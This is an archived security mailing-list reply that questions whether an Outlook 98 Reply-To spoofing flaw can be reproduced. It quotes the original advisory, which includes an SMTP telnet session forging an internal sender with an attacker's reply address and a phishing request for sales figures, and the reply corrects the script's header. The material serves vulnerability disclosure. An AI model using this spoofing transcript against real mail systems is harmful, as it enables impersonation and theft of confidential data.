Re: Outlook 98 allows spoofing internal users

[Sebastian.Schreiber () STUDENT UNI-TUEBINGEN DE (Sebastian Schreiber)]

Hi Nate,

I was not able to reproduce the exploit that you reported to the
bugtraq mailing list. Outlook98 did exactly what I expected: when I
open the mail, I see the "From:"-header in the message. When I reply
to the email, Outlook takes the "Reply-To:"-address of the
header. Which version of Outlook did you test?

Best Regards, Sebastian

PS: your "quick script" has a little bug: the header entry should be
    "Reply-To:" instead of "Reply To:".


Nate Lawson <nate () root org> wrote:
> Problem: Outlook uses a sender's Reply-To address silently, allowing
>          a user to inadvertently send data to an Internet mail account
>          when intending to reply to an internal, trusted user.
>
> Impact: Anyone on the Internet can spoof a trusted internal Exchange user
>         and get replies sent back to themself without the user knowing they
>         weren't responding to another internal user.
>
> How to reproduce:
>
> 1.  Spoof mail as an internal user with a Reply-To address claiming to be
>     an internal user, but an address of an Internet account, say hotmail.
> 2.  Go into Outlook and read the mail.  The mail looks like it was internally
>     generated but viewing the full Internet headers under View->Options
>     shows the bogus Reply-To header.
> 3.  Hit Reply in Outlook.  The To: field looks like it's going to a valid
>     internal user, but right clicking on it and choosing Properties shows
>     that the internal user it is sending the reply to is actually an Internet
>     address.
> 4.  Enter some text and hit Send.  Observe that the mail went to the attacker's
>     account, not the internal one.
>
> A quick script:
>
> {root 5:00pm} ~> telnet mail.example.com 25
> Trying 10.20.2.5...
> Connected to mail.example.com.
> Escape character is '^]'.
> 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
> helo losebag
> 250 OK
> mail from:<>
> 250 OK - mail from <>
> rcpt to:<accounting () example com>
> 250 OK - Recipient <accounting () example com>
> data
> 354 Send data.  End with CRLF.CRLF
> From: Nate Lawson
> To: Accounting
> Reply To: Nate Lawson<intruder () hotmail com>
> Subject: important!
>
> Please reply with the latest copy of our sales figures!
>
> Thanks,
> Nate
> .
> 250 OK
> quit
> 221 closing connection
> Connection closed by foreign host.
>
> Now, a reply to the email will go not to the trusted internal user Nate
> Lawson <nlawson () example com> but to the attacker, <intruder () hotmail com>.
> Worse, the user sees no indication that the mail is outward-bound!  The
> To: field on the reply simply shows "Nate Lawson", a valid internal user.
>
> Affected programs:  Only tested on Outlook 98
>
> Known use of this bug to get confidential information:  none yet
>
> Suggested Fix: always show the full email address of any recipient that is
> not local (i.e. username () example com would be hidden but any instance of
> user () hotmail com would be shown)
>
> Microsoft has been notified, but claimed this was a weakness in SMTP and
> would not be fixed until a secure successor to SMTP is implemented. They
> obviouly missed the point -- the error is not in that mail can be forged,
> but that Outlook allows a user to respond to a message that looks local
> and legitimate, but is actually destined for an outside address.
>
> -Nate

--
-- What's a letter?  Is it like E-mail?                ((o)(o))
|---------------------------------------------------ooOo-(  )-oOoo-|
| Sebastian Schreiber, Burgholzweg 36, 72070 Tübingen    (  )      |
| Germany, Voice: ++49 (0)7071 49570                     (  )      |
|          GSM: 0049-173-3502725                         (..)      |
|------------------------------------------------------------------|
 Key fingerprint = 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98